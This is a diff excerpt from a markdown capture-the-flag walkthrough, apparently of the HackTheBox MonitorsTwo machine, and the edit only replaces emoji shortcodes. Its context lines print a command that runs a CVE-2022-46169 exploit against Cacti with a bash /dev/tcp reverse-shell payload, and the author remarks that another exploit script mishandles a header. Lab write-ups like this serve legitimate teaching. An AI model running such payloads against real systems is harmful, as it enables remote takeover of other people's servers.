4wayhandshake/4wayhandshake.github.io/content/walkthrough/monitorstwo.md

 python3 CVE-2022-46169.py -c "bash -c 'exec bash -i &>/dev/tcp/10.10.14.2/32476 <&1'" --n_host_ids 100 --n_local_data_ids 100 http://$RADDR
 ```

-And... voila! :tada: We have a reverse shell:
+And... voila! 🎉 We have a reverse shell:

 ![reverse shell](reverse%20shell.png)

-> :monkey: This got me wondering why the previous script didn't work.
+> 🐒 This got me wondering why the previous script didn't work.
 >
 > Doing a quick comparison of the code, it looks like `51166.py` mixed up the `X-Forwarded-For` header with the address of the Cacti server.
 I corrected this in my modification of `51166.py` and tried re-running it, but still no luck: no reverse shell.
 >